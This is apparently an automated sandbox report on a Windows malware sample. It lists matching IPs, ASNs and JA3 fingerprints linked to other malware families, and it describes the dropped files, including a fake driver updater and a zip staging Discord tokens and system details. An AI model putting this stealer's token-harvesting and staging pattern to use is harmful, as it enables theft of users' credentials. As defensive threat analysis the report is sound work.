                                                        • 149.154.167.220
                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 149.154.167.220
                                                        https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 149.154.167.220

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        TELEGRAMRUREQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 149.154.167.220
                                                        IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 149.154.167.220
                                                        Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                        • 149.154.167.220
                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                        • 149.154.167.220
                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 149.154.167.220
                                                        https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 149.154.167.220
                                                        FASTLYUShttps://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-38C94998HP8303006%2FU-6W395593JN817925D%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=zXwVIpXj0TLoUUVd7LF7YO7Vn0P0pGmohCrZAA&expId=p2p&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-38C94998HP8303006%2FU-6W395593JN817925D%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3DzXwVIpXj0TLoUUVd7LF7YO7Vn0P0pGmohCrZAA%22%7D%7D&flowContextData=WCbMpIfBC2zD_Vwi6z3F_WMjvVgL9KAg4VGxkQGm--r9WC46Rw0b3So1TvqmwvFdoRWFdG_cUNrteKszlnpJxolPsBU1BNQyRv6LHVysWODuddkPqXX9S4re2g5LYA2xwH980Lj98cDnxlw4h8uuq5iuQnuPsc3_irSmJMojPNeGUaICsuT2N-CNuQeeeF9hC3Ish5suhy-Cmrm1MMEdEsv2OA-I56nnou3fuMVVmpWgNYFSsHXfGvjTKrVC3NG87NOMWl8csAdQ0fUX3F7upVh_pS-U8hMFRoQg0SS6pKSJ2mx2NN2FOCLyZfYLlfEK4uj4pzhAPjwdC5LoUkP1FYGX2XQauIc41h_sdHKY2Vwek8NlJt3neVkC85yoXbi8ToGqkpzhUh8CXPkVfSH8XBk2cGecxwflkpVf6ckus1KTrC8ojoxRaeeUB9Z0k6uHgQFcUNB9j2OiraPXClTsCYO04Tn52OGNNhne2EDtpkDiPT4y0l6sVLeKB1uuxBTw9IiniPLD_ZBbmMIGU_u1TMny0cn5UkQoXMv789SfZFgReFestttAfbTLejWnVXoGIFIINoAk9fIGrIQbyMYvljl8fPreKRAu393Y_8Sila2-Ix6sp_nDZwCJghaO3CR9Go228jzVDRJgzV7M&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=5780db2e-b17f-11ef-bb4e-e749601a9542&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=5780db2e-b17f-11ef-bb4e-e749601a9542&calc=f856604ff2c44&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signinGet hashmaliciousUnknownBrowse
                                                        • 151.101.3.1
                                                        LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                        • 151.101.65.137
                                                        2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                        • 199.232.196.209
                                                        0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                        • 151.101.65.137
                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                        • 151.101.129.91
                                                        phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                        • 151.101.129.91
                                                        https://searchandprint.recipesGet hashmaliciousUnknownBrowse
                                                        • 151.101.2.137
                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                        • 151.101.129.91
                                                        DREAMHOST-ASUSNew Order.exeGet hashmaliciousFormBookBrowse
                                                        • 173.236.199.97
                                                        la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                        • 64.90.37.46
                                                        https://new.goshenpubliclibrary.org/Get hashmaliciousUnknownBrowse
                                                        • 173.236.138.114
                                                        http://winningwriters.comGet hashmaliciousUnknownBrowse
                                                        • 66.33.207.42
                                                        arm5.elfGet hashmaliciousMiraiBrowse
                                                        • 173.236.207.2
                                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 67.205.45.17
                                                        yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                        • 75.119.202.130
                                                        https://blmphilly.com/Get hashmaliciousUnknownBrowse
                                                        • 208.113.142.161
                                                        botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 208.113.201.130
                                                        http://ihaveabadreputation.com/Get hashmaliciousEICARBrowse
                                                        • 69.163.178.245

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eREQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145
                                                        Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                        • 185.199.109.133
                                                        • 20.233.83.145

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exerPO767575.cmdGet hashmaliciousDBatLoaderBrowse
                                                          Social_Security_Statement_Review.vbsGet hashmaliciousUnknownBrowse
                                                            Pollosappnuevo.batGet hashmaliciousXWormBrowse
                                                              PollosAplicaccion.batGet hashmaliciousXWormBrowse
                                                                gcapi64.cmdGet hashmaliciousUnknownBrowse
                                                                  fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                                                    fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                        BrowserUpdater.lnkGet hashmaliciousUnknownBrowse
                                                                          Updater.lnkGet hashmaliciousUnknownBrowse

                                                                            Created / dropped Files

                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.8307348719753049
                                                                            Encrypted:false
                                                                            SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugR:gJjJGtpTq2yv1AuNZRY3diu8iBVqFn
                                                                            MD5:22920BD655FDC5F1CAD5DE2A5DC3DE3A
                                                                            SHA1:2B855588844E683A428B2B78C6A458BED9826F39
                                                                            SHA-256:97AF935028FA2D0D9A3D871FAF4D15AAA87A868ECE31FF72EF84CA866FBE96B4
                                                                            SHA-512:1C049B85C29627DC78B8C24C8EA11192E3F4FC2456B2BA54880A2829FF86F9A51B903C38FEB48CAC4E03D3A257484BE028CD84457485853FE58995AD9F5FD726
                                                                            Malicious:false
                                                                            Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc9038129, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.6586077550858218
                                                                            Encrypted:false
                                                                            SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                            MD5:57147E6E35335C8C0381095C01FA8EBC
                                                                            SHA1:292F8CDCCF9786B4C2E2435F36D06F00B5043B47
                                                                            SHA-256:93D4C6CA4D78DC1B312E9EB3147153ADF892081F3770094F7E0CF4AFE08077DA
                                                                            SHA-512:9FDF234B223B741A6E440E4F8521BBA3F1B0B1427691D5E583BD1A5F0A256CC0C1118DE96C7EC124FC9D1E8FB1EB88D6ACA00121122B88C5090CE17E06094BF2
                                                                            Malicious:false
                                                                            Preview:...)... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................T.Hv.....|..................F.......|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.08066410224984144
                                                                            Encrypted:false
                                                                            SSDEEP:3:wW/EYeHUmq5tGuAJkhvekl1Grm34illrekGltll/SPj:wW/EzH/q5trxl8rm3NJe3l
                                                                            MD5:D1C0BEB032A1032605B2218ED319B999
                                                                            SHA1:1EFC525C98C10CB2A29792B6AF9D0B6BCA169456
                                                                            SHA-256:A985F463E28AF42C702FA8592F7A61ADE9E848A661E1C6BBDD615098E99F42EB
                                                                            SHA-512:01988627AAF544F65CFB00379FEC10CA84593034F497F4A94156FC3D28228430FAE52B73AFEC9F9D04E735D1496365B90C92CC7BAA460990FC13E4A260B6DF70
                                                                            Malicious:false
                                                                            Preview:...i.....................................;...{.......|.......{...............{.......{...XL......{..................F.......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):9713
                                                                            Entropy (8bit):4.940954773740904
                                                                            Encrypted:false
                                                                            SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emq:cEU/iQ0HzAFGLCib4Sib4IY1Y
                                                                            MD5:CAA3941248728535C7AFD19683C2FE46
                                                                            SHA1:74848C69CB14FC06C53D350E8156F9160F730112
                                                                            SHA-256:EC129D97386F9F1CD44908FA5C8C9163DA7DA5869793A861EE074A6B77D0E18A
                                                                            SHA-512:94A9474447DB299556FA6323AEBBC2C1F5808FAA70AFA5394E24F3FB8567F5C821D49D0E9D158004C4829EFA7CE2093BB99437356005E59967C7120630ADE893
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1504
                                                                            Entropy (8bit):5.245545652341003
                                                                            Encrypted:false
                                                                            SSDEEP:24:3TSKco4KmZjKbmuu1od6em9qr9tYs4RPQoUEJ0gt/NKmNUNErg0tecJ:DSU4xymdajm9qr9tz4RIoUl8NfUNElX
                                                                            MD5:142A5CB1CF80F83880A8F2622F3A303B
                                                                            SHA1:DC85335C8850451216D7D98AC2FFDE325DC1929C
                                                                            SHA-256:6BCC6B8C4464AAC2375D5148825CCE34B9BE4402ED47F1F53FEB195BCF77B05D
                                                                            SHA-512:B5504BA71033F73E8A9FBF7B310D9E2706401C7C6D13C30528C475F02DC52786125E977DFB27595E8D826370C4E3385A5898FDFF44B3C20FE964EEA4D7C05825
                                                                            Malicious:false
                                                                            Preview:@...e...........4...............................................@...............|.jdY\.H.s9.!..|4.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ny2eufm.g5m.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1eqx0ft3.myf.psm1

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihdav2d1.b53.ps1

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhnd4aav.voa.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuyb0nt3.lwr.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opbtcx5u.khg.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quqemc0q.ggl.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tunpr0cs.h5i.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uj0jbjyb.fyi.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wloehycy.qx5.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\user.zip

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                            Category:dropped
                                                                            Size (bytes):859
                                                                            Entropy (8bit):6.060592770436276
                                                                            Encrypted:false
                                                                            SSDEEP:12:5jlXMr64XldmM/AtejB9GYE0/5Sui9EBdSUTiMo14XYwMr6cXCdmd6/Ucte3V9Gp:9Q6Sqdg9i97KSV6P3Jrt
                                                                            MD5:DE7B22F4A9C7F42E2C63B59C598B6183
                                                                            SHA1:DBCE04E230396E99D942846DAB6ECE70372292E9
                                                                            SHA-256:013EEB699A45405C53EE080A99F91966C89075C60CA70DD06730AA0FEDAFAB9C
                                                                            SHA-512:8BAD25B929722B95DA31CEAC6B0EE6AA6D3C194179A3F99D70A69353166F198DCB2CADAC3CDC7A33515D0CB85E537F8D20023F37F718B8F40D61C9F29E1F5C94
                                                                            Malicious:true
                                                                            Preview:PK.........K.Y................user\games\PK.........K.Y................user\SocialMedias\PK........jK.Y................user\discord_tokens.txtPK........jK.Y.<+#g...8.......user\pc_specifications.jsonu.Oo.0...~...&c...).!.3......B..PL..4~..U..]zx...>.....e>.....8...0Tm.{..[P%pb..I..pM...<......:Z.....F.Y8..;.45.<...50}>..0/.d.m.9..;.cX..;.....u.....\....E.3..kG...e..%..1k....*y..iv5S.......k&...m...#D..;.....Cb.n.F....5~..ty......o..I....V...d|..e..(K..t.B..y..O....jS.I....wv}]K......<.V.p6.i;..N....M.o.c...>/...!.a....iu..n..iP#...._PK...........K.Y..............................user\games\PK...........K.Y..........................+...user\SocialMedias\PK..........jK.Y..........................]...user\discord_tokens.txtPK..........jK.Y.<+#g...8.....................user\pc_specifications.jsonPK..............6.....

                                                                            C:\Users\user\AppData\Local\Temp\user\pc_specifications.json

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):568
                                                                            Entropy (8bit):5.013013596853395
                                                                            Encrypted:false
                                                                            SSDEEP:12:LDWaT5xl17w7sxDlK4WW7iZ6423oXWpLQF4fZTHOU:LDWaT5xlhw7stZWWj423KAK4NOU
                                                                            MD5:27C63E2CC6903DB8917D107EB6F5A353
                                                                            SHA1:FFE8227C83C6B8208486BE81F088689D166DE7CB
                                                                            SHA-256:346356DA87AA5733F267FE3A5AB8A1648279D3DBFE960696EA63F9D2959F7366
                                                                            SHA-512:7D403FBF8CF13A9024DDB481B4D4F65913EAF4BE6795AEA2CE7CB36AD45A22F7D6AE2574637347A91842607F0C09D5EB67C25CDC0A7A72CB24811E3210EE10BA
                                                                            Malicious:false
                                                                            Preview:{. "UUID": "2ED92742-89DC-DD72-92E8-869FA5A66493",. "CPU": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz",. "MacAddress": "EC:F4:BB:57:0D:C9",. "Motherboard": {. "Manufacturer": "8NGZW3T9CM",. "Product": "YC3ZRXPDGT",. "SerialNumber": "0647964824311339". },. "GPU": [. {. "Name": "OPL71SY",. "VideoProcessor": "3Y7NZTSRB",. "AdapterRAM": 1073741824. }. ],. "WifiProfiles": null,. "Disks": [. {. "Name": "C:",. "FileSystem": "NTFS",. "VolumeName": "",. "FreeSpace": 2999558144,. "Size": 158430209. }. ].}

                                                                            C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):452608
                                                                            Entropy (8bit):5.459268466661775
                                                                            Encrypted:false
